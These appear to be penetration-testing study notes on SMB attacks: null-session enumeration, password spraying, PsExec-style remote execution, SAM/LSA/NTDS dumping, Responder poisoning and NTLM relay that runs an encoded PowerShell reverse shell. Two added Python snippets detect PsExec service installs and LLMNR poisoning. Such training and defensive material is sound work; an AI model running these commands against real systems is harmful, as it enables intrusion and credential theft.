> See SMB Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/SMB (139,445)|SMB (139,445)]]

# Introduction

- Server Message Block (SMB) was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138
- With the release of Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer
- Samba is a Unix/Linux-based open-source implementation of the SMB protocol
- Another protocol commonly related to SMB is MSRPC
    - RPC gives an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication
    - It is specified in [MS-RPCE](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15), which defines an RPC over SMB Protocol that can use SMB Protocol named pipes as its underlying transport
- Against SMB we can abuse misconfigurations or excessive privileges, exploit known vulnerabilities, or discover new vulnerabilities

# Enumeration

```bash
sudo nmap <target_ip> -sV -sC -p139,445
```

# Misconfigurations

- SMB can be configured to not require authentication, which is called a null session
- SMB techniques:

```bash
smbclient -N -L //<target_ip>                                   # attempts a null session and lists shares
smbclient //<target_ip> -U <user_name>
smbclient //<target_ip> --user <user_name>%'<password>'          # connect with specified user and password
smbmap -H <target_ip>                                           # attempts a null session and lists shares
smbmap -H <target_ip> -r notes                                  # recursively lists the contents of a specified directory
smbmap -H <target_ip> --download "notes\note.txt"               # downloads a file
smbmap -H <target_ip> --upload test.txt "notes\test.txt"        # uploads a file
nxc smb <target_ip> -u '' -p '' --shares --verbose              # attempts a null session and lists shares
nxc smb <target_ip> -u <username> -p <password> --shares        # shows shares and permissions for the user
nxc smb <target_ip> -u <username> -p <password> --spider share  # shows the contents of a share
nxc smb <target_ip> -u <username> -p <password> --get-file remote_loc local_dest
nxc smb <target_ip> -u <username> -p <password> --put-file local_file remote_dest
```

- RPC technique:

```bash
rpcclient -U'%' <target_ip>      # attempts a null session
rpcclient $> enumdomusers        # lists user names and their associated RIDs
```

- `Enum4linux` technique
    - Leverages `nmblookup`, `net`, `rpcclient`, and `smbclient`

```bash
enum4linux-ng <target_ip> -A -C
```

![[images/Pasted image 20251016120550.png]]

# SMB Attacks

## Brute Forcing & Password Spraying

```bash
nxc smb <target_ip> -u <username/list> -p <password/list>
```

```bash
# nxc smb flags
--local-auth              # use for a non-domain-joined computer
--continue-on-success     # try all permutations available after a hit
--no-bruteforce           # sequentially try line_1:line_1 from user_list:password_list, and so on
```

## Remote Code Execution (RCE)

- [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) is a tool that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually
    - Uses a Windows service image embedded inside its executable
    - `PsExec` takes this service and deploys it to the `admin$` share (by default) on the remote machine
    - Then, `PsExec` uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API
    - Next, `PsExec` starts the PSExec service on the remote machine
    - This service then creates a [named pipe](https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes) that can send commands to the system
- `PsExec` can be downloaded from the Microsoft website
- Several Linux implementations also exist:
    - `impacket-psexec`
    - `impacket-smbexec`
    - `impacket-atexec`
    - `netexec`
    - `metasploit psexec`

```bash
impacket-psexec -h                                      # shows the help menu for psexec
impacket-psexec administrator:'password'@<target_ip>    # connects to the remote machine with a cmd prompt
```

```bash
netexec smb <target_ip> -u Administrator -p 'Password123!'                                   # tests admin login
netexec smb <target_ip> -u Administrator -H <hash>                                           # tests admin login with PtH
netexec smb <target_ip> -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec # executes the whoami command against the target machine using smbexec
netexec smb <target_ip> -u Administrator -p 'Password123!' --loggedon-users                  # enumerates currently logged-on users
netexec smb <target_ip> -u Administrator -p 'Password123!' --sam                             # dumps the SAM
netexec smb <target_ip> -u Administrator -p 'Password123!' --lsa                             # dumps LSA secrets
netexec smb <target_ip> -u Administrator -p 'Password123!' --NTDS                            # dumps NTDS.dit via RPC if the target is a DC
netexec smb <target_ip> -u Administrator -p 'Password123!' --NTDS VSS                        # dumps NTDS.dit via VSS if the target is a DC
```

## Forced Authentication Attacks

- Abuse the SMB protocol by creating a fake SMB server to capture NetNTLMv1/v2 hashes
- The common tool for this purpose is `Responder`
    - An LLMNR (link-local multicast name resolution), NBT-NS (NetBIOS Name Service), and MDNS (multicast domain name resolution) poisoner with different capabilities, one of them being the ability to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes
    - In its default configuration, `Responder` will find LLMNR and NBT-NS traffic
    - Then, `Responder` will respond on behalf of the servers the victim is looking for and capture their NetNTLM hashes
- Suppose a user mistyped a shared folder's name as `\\mysharefoder\` instead of `\\mysharedfolder\`
    - In this case, all name resolutions will fail because the name does not exist, and the machine will send a multicast query to all devices on the network, including us running our fake SMB server
    - This is a problem because no measures are taken to verify the integrity of the responses. Attackers can take advantage of this mechanism by listening in on such queries and spoofing responses, leading the victim to believe malicious servers are trustworthy
    - This trust is usually used to steal credentials

```bash
# create a fake SMB server with the default config on the given interface
sudo responder -I ens33
```

- If you notice multiple hashes for one account, this is because NTLMv2 uses both a client-side and a server-side challenge, randomized for each interaction
- Captured hashes can be cracked with `hashcat` mode 5600
- If we cannot crack the hash, we can potentially relay the captured hash to another machine using [impacket-ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) or Responder's [MultiRelay.py](https://github.com/lgandx/Responder/blob/master/tools/MultiRelay.py)
- Generate a PowerShell base64-encoded revshell back to the Kali host with [https://www.revshells.com](https://www.revshells.com/)

```bash
nc -lvnp 9001    # set up listener on Kali host before above relaying of
```

```bash
cat /etc/responder/Responder.conf | grep 'SMB ='                    # confirm that SMB = Off in the Responder config file
impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip>    # dumps SAM hashes by default, but we can execute a command with the -c flag
impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip> -c 'powershell -e <powershell_base64_encoded_revshell>'
```
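A defender's view of the service-install step in the PsExec flow from the RCE section above (binary dropped on the `admin$` share, service registered and started through the Service Control Manager): Windows records every new service as System event 7045, and those records can be screened for that pattern. This is an added example written for these notes, not code from the original or from PsExec, impacket or netexec; the sample records, service names and the four heuristics are constructed assumptions modelled on the behaviour described above, not captured logs or a vendor rule set.

```python
import re

# Constructed sample 7045 "service was installed" records (not real logs). The
# suspicious ones are modelled on the PsExec / impacket flow described above:
# a service binary dropped on ADMIN$, or a service whose image is a cmd one-liner.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Dell SupportAssist",
     "ImagePath": r"C:\Program Files\Dell\SupportAssist\svc.exe"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # random service name (assumed) as used by impacket-style tools
    {"EventID": 7045, "ServiceName": "bJXYwvZe", "ImagePath": r"%SystemRoot%\bJXYwvZe.exe"},
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat"},
    {"EventID": 7036, "ServiceName": "PSEXESVC", "ImagePath": ""},  # state change, not an install
]

# Illustrative heuristics (assumptions, not a vendor rule set); each is (label, predicate).
RULES = [
    ("well-known PsExec service name",
     lambda e: e["ServiceName"].upper() == "PSEXESVC"),
    ("image path on an administrative share (ADMIN$/C$)",
     lambda e: re.search(r"\\\\[^\\]+\\(ADMIN|C)\$", e["ImagePath"], re.I) is not None),
    ("service image is a cmd.exe/%COMSPEC% one-liner",
     lambda e: re.search(r"(cmd\.exe|%COMSPEC%)\s+(/Q\s+)?/C\b", e["ImagePath"], re.I) is not None),
    ("random 8-letter service name with a same-named exe",
     lambda e: re.fullmatch(r"[A-Za-z]{8}", e["ServiceName"]) is not None
     and e["ServiceName"].lower() + ".exe" in e["ImagePath"].lower()),
]

def flag_service_installs(events):
    """Return [(ServiceName, [matched rule labels])] for 7045 events that hit any rule."""
    hits = []
    for event in events:
        if event.get("EventID") != 7045:  # only service-install records are relevant
            continue
        matched = [label for label, check in RULES if check(event)]
        if matched:
            hits.append((event["ServiceName"], matched))
    return hits

if __name__ == "__main__":
    for name, why in flag_service_installs(SAMPLE_EVENTS):
        print(f"suspicious service install: {name!r} -> {', '.join(why)}")
```

Feeding real 7045 records (exported as dicts with the same three keys) into `flag_service_installs` is enough to try it on a host; the heuristics are deliberately narrow and should be tuned to the environment.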
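The LLMNR poisoning that `Responder` performs rests on the same missing integrity check described above, and that gives defenders a cheap canary: query the LLMNR multicast group for a name that cannot exist and treat any answer as a spoof. This is an added example written for these notes, not part of the original or of Responder; the `canary-` name prefix, the 2-second timeout and sending via the host's default interface are assumptions. The constructed reply embedded in the code lets the parser run offline, while `llmnr_canary()` itself needs a live network segment.

```python
from contextlib import suppress
import random, socket, string, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group and UDP port

def build_llmnr_query(name, txid):  # DNS-style header, one question, QTYPE=A, QCLASS=IN
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0 -> standard query
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)

def _skip_name(data, off):  # advance past a name: labels, or a 2-byte compression pointer
    while data[off] != 0:
        if data[off] & 0xC0 == 0xC0:
            return off + 2
        off += 1 + data[off]
    return off + 1

def parse_llmnr_response(data, txid):
    """Return the answered A-record IPs if data is a response to txid, else None."""
    if len(data) < 12 or struct.unpack("!H", data[:2])[0] != txid or not data[2] & 0x80:
        return None  # wrong transaction id, or QR bit clear (a query, not a response)
    _id, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    ips, off = [], 12
    for _ in range(qd):
        off = _skip_name(data, off) + 4  # skip QTYPE and QCLASS
    for _ in range(an):
        off = _skip_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return ips

# Constructed reply (not captured): txid 0x1234, QR set, question "mysharefoder", one A
# answer (name compression pointer 0xC00C, TTL 30) claiming the mistyped name is 10.0.0.5
SAMPLE_POISONED_REPLY = (b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00"
                         + b"\x0cmysharefoder\x00\x00\x01\x00\x01"
                         + b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\x0a\x00\x00\x05")

def llmnr_canary(timeout=2.0):
    """Ask for a random name that cannot exist; any host that answers is a poisoner."""
    name = "canary-" + "".join(random.choices(string.ascii_lowercase, k=10))
    txid, found = random.randrange(0x10000), []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock, suppress(socket.timeout):
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:  # keep collecting answers until the timeout fires
            data, (src, _port) = sock.recvfrom(1024)
            if (ips := parse_llmnr_response(data, txid)) is not None:
                found.append((src, ips))
    return found
```

Running `llmnr_canary()` periodically from a monitoring host and alerting on a non-empty result catches a poisoner on the segment; disabling LLMNR and NBT-NS on the clients removes the attack surface altogether.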